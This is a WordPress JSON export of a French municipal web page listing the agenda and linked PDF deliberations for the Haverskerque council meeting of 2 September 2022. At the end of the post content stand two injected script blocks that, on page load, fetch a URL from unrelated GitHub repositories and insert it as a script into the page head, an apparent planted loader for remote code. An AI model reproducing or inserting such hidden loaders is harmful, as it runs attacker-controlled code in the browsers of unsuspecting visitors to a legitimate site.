{"id":596,"date":"2022-09-03T13:35:00","date_gmt":"2022-09-03T11:35:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=596"},"modified":"2024-07-29T06:38:40","modified_gmt":"2024-07-29T04:38:40","slug":"conseil-municipal-du-02-septembre-2022","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/","title":{"rendered":"Conseil Municipal du 02 Septembre 2022"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR<\/h3>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 24 juin 2022.<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Informations au Conseil Municipal.<\/p>\n\n\n\n<p><strong>INSTITUTION<\/strong><\/p>\n\n\n\n<p>1. Conseil municipal &#8211; changement de lieu de r\u00e9union \u00e0 la salle Victor Dehaine.<br>2. D\u00e9nomination d\u2019une salle communale.<\/p>\n\n\n\n<p><strong>FINANCES<\/strong><\/p>\n\n\n\n<p>3. Participation aux d\u00e9penses de fonctionnement de l\u2019\u00e9cole Saint-Exup\u00e9ry d\u2019Haverskerque &#8211; Mise \u00e0 jour.<br>4. Mise en place de la nomenclature M57 \u00e0 compter du 1er janvier 2023.<\/p>\n\n\n\n<p><strong>URBANISME<\/strong><\/p>\n\n\n\n<p>5. SIDEN-SIAN &#8211; Adh\u00e9sion de nouvelles communes.<br>6. Acquisition par exercice du droit de pr\u00e9emption de l\u2019immeuble sis 45 rue de l\u2019\u00e9glise \u00e0 Haverskerque.<\/p>\n\n\n\n<p><strong>CULTURE<\/strong><\/p>\n\n\n\n<p>7. Convention d\u2019objectifs avec le Conseil D\u00e9partemental du Nord &#8211; Autorisation de signature.<\/p>\n\n\n\n<p><strong>RESSOURCES HUMAINES<\/strong><\/p>\n\n\n\n<p>8. Intervention sportive en milieu scolaire &#8211; Recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2022-2023.<br>9. Intervention musicale en milieu scolaire &#8211; Recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2022-2023.<br>10. Activit\u00e9 extrascolaire &#8211; Recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2022-2023.<br>11. Indemnit\u00e9 forfaitaire complmentaire pour \u00e9lections (IFCE) &#8211; Mise \u00e0 jour de la d\u00e9lib\u00e9ration du 29 juin 2004.<br>12. Attribution de ch\u00e8ques cadeaux aux agents communaux.<br>13. Recours au contrat d\u2019apprentissage.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2081\"  _slug=\"ordre-du-jour-de-la-seance-du-02-septembre-2022\" data-title=\"ordre-du-jour-de-la-seance-du-02-septembre-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 02 septembre 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2081 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convocation_cm_02092022.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2078\"  _slug=\"proces-verbal-du-conseil-municipal-du-02-septembre-2022\" data-title=\"proces-verbal-du-conseil-municipal-du-02-septembre-2022\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Proc\u00e8s-verbal du Conseil Municipal du 02 septembre 2022<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2078 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/proces-verbal_du_conseil_municipal_du_02092022-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2075\"  _slug=\"modification-du-lieu-de-reunion-a-la-salle-victor-dehaine\" data-title=\"modification-du-lieu-de-reunion-a-la-salle-victor-dehaine\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Modification du lieu de r\u00e9union \u00e0 la salle Victor Dehaine<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2075 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/034_2022_modification_du_lieu_de_vote.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2072\"  _slug=\"participation-aux-depenses-de-fonctionnement-de-lecole-st-exupery\" data-title=\"participation-aux-depenses-de-fonctionnement-de-lecole-st-exupery\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Participation aux d\u00e9penses de fonctionnement de l\u2019\u00e9cole St-Exup\u00e9ry<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2072 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/035__participation_scolarite.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2069\"  _slug=\"mise-en-place-de-la-nomenclature-m57\" data-title=\"mise-en-place-de-la-nomenclature-m57\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Mise en place de la nomenclature M57<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2069 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/036_2022_m57.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2066\"  _slug=\"siden-sian-adhesion-de-nouvelles-communes\" data-title=\"siden-sian-adhesion-de-nouvelles-communes\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >SIDEN-SIAN Adh\u00e9sion de nouvelles communes<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2066 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/037_2022_siden_sian_nouvelles_adhesions.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2063\"  _slug=\"preemption-de-limmeuble-sis-45-rue-de-leglise\" data-title=\"preemption-de-limmeuble-sis-45-rue-de-leglise\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Pr\u00e9emption de l\u2019immeuble sis 45 rue de l\u2019\u00e9glise<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2063 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/038_2022_preemption_rue_de_l_eglise.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2060\"  _slug=\"convention-dobjectifs-avec-le-conseil-departemental-du-nord\" data-title=\"convention-dobjectifs-avec-le-conseil-departemental-du-nord\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Convention d\u2019objectifs avec le Conseil D\u00e9partemental du Nord<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2060 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/039_2022_convention_cd59-mediatheque.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2057\"  _slug=\"recrutement-et-remuneration-dun-intervenant-sportif-pour-lannee-scolaire-2022-2023\" data-title=\"recrutement-et-remuneration-dun-intervenant-sportif-pour-lannee-scolaire-2022-2023\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Recrutement et r\u00e9mun\u00e9ration d\u2019un intervenant sportif pour l\u2019ann\u00e9e scolaire 2022-2023<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2057 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/040_2022_intervention_sportive.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2054\"  _slug=\"recrutement-et-remuneration-dun-intervenant-musical-pour-lannee-scolaire-2022-2023\" data-title=\"recrutement-et-remuneration-dun-intervenant-musical-pour-lannee-scolaire-2022-2023\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Recrutement et r\u00e9mun\u00e9ration d\u2019un intervenant musical pour l\u2019ann\u00e9e scolaire 2022-2023<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2054 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/041_2022_intervention_musicale.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2051\"  _slug=\"recrutement-et-remuneration-des-intervenants-danse-pour-lannee-scolaire-2022-2023\" data-title=\"recrutement-et-remuneration-des-intervenants-danse-pour-lannee-scolaire-2022-2023\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2022-2023<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2051 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/042_2022_intervenants_danse.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2048\"  _slug=\"ifce-mise-a-jour-de-la-deliberation-du-29-juin-2004\" data-title=\"ifce-mise-a-jour-de-la-deliberation-du-29-juin-2004\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >IFCE &#8211; Mise \u00e0 jour de la d\u00e9lib\u00e9ration du 29 juin 2004<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2048 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/043_2022_ifce.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2045\"  _slug=\"attribution-de-cheques-cadhoc-aux-agents-communaux\" data-title=\"attribution-de-cheques-cadhoc-aux-agents-communaux\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Attribution de ch\u00e8ques CADHOC aux agents communaux<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2045 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/044_2022_attribution_cadhoc_au_personnel.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2042\"  _slug=\"recours-au-contrat-dapprentissage\" data-title=\"recours-au-contrat-dapprentissage\" wpoptions=\"true\" thumb=\"https:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Recours au contrat d\u2019apprentissage<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2042 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/045_2022_recours_au_contrat_d_apprentissage.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 24 juin 2022.&nbsp;Informations au Conseil Municipal. INSTITUTION 1. Conseil municipal &#8211; changement de lieu de r\u00e9union \u00e0 la salle Victor Dehaine.2. D\u00e9nomination d\u2019une salle communale. FINANCES 3. Participation aux d\u00e9penses de fonctionnement de l\u2019\u00e9cole Saint-Exup\u00e9ry d\u2019Haverskerque &#8211; Mise \u00e0 jour.4. Mise en place de la nomenclature M57 \u00e0 compter du 1er janvier 2023. URBANISME 5. SIDEN-SIAN &#8211; Adh\u00e9sion de nouvelles communes.6. Acquisition par exercice du droit de pr\u00e9emption de l\u2019immeuble sis 45 rue de l\u2019\u00e9glise \u00e0 Haverskerque. CULTURE 7. Convention d\u2019objectifs avec le Conseil D\u00e9partemental du Nord &#8211; Autorisation de signature. RESSOURCES HUMAINES 8. Intervention sportive en milieu scolaire &#8211; Recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2022-2023.9. Intervention musicale en milieu scolaire &#8211; Recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2022-2023.10. Activit\u00e9 extrascolaire &#8211; Recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2022-2023.11. Indemnit\u00e9 forfaitaire complmentaire pour \u00e9lections (IFCE) &#8211; Mise \u00e0 jour de la d\u00e9lib\u00e9ration du 29 juin 2004.12. Attribution de ch\u00e8ques cadeaux aux agents communaux.13. Recours au contrat d\u2019apprentissage.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-596","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 02 Septembre 2022 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 02 Septembre 2022 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 24 juin 2022.&nbsp;Informations au Conseil Municipal. INSTITUTION 1. Conseil municipal &#8211; changement de lieu de r\u00e9union \u00e0 la salle Victor Dehaine.2. D\u00e9nomination d\u2019une salle communale. FINANCES 3. Participation aux d\u00e9penses de fonctionnement de l\u2019\u00e9cole Saint-Exup\u00e9ry d\u2019Haverskerque &#8211; Mise \u00e0 jour.4. Mise en place de la nomenclature M57 \u00e0 compter du 1er janvier 2023. URBANISME 5. SIDEN-SIAN &#8211; Adh\u00e9sion de nouvelles communes.6. Acquisition par exercice du droit de pr\u00e9emption de l\u2019immeuble sis 45 rue de l\u2019\u00e9glise \u00e0 Haverskerque. CULTURE 7. Convention d\u2019objectifs avec le Conseil D\u00e9partemental du Nord &#8211; Autorisation de signature. RESSOURCES HUMAINES 8. Intervention sportive en milieu scolaire &#8211; Recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2022-2023.9. Intervention musicale en milieu scolaire &#8211; Recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2022-2023.10. Activit\u00e9 extrascolaire &#8211; Recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2022-2023.11. Indemnit\u00e9 forfaitaire complmentaire pour \u00e9lections (IFCE) &#8211; Mise \u00e0 jour de la d\u00e9lib\u00e9ration du 29 juin 2004.12. Attribution de ch\u00e8ques cadeaux aux agents communaux.13. Recours au contrat d\u2019apprentissage.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2022-09-03T11:35:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 02 Septembre 2022\",\"datePublished\":\"2022-09-03T11:35:00+00:00\",\"dateModified\":\"2024-07-29T04:38:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/\"},\"wordCount\":199,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/\",\"name\":\"Conseil Municipal du 02 Septembre 2022 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2022-09-03T11:35:00+00:00\",\"dateModified\":\"2024-07-29T04:38:40+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2022\\\/09\\\/03\\\/conseil-municipal-du-02-septembre-2022\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 02 Septembre 2022\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 02 Septembre 2022 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 02 Septembre 2022 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 24 juin 2022.&nbsp;Informations au Conseil Municipal. INSTITUTION 1. Conseil municipal &#8211; changement de lieu de 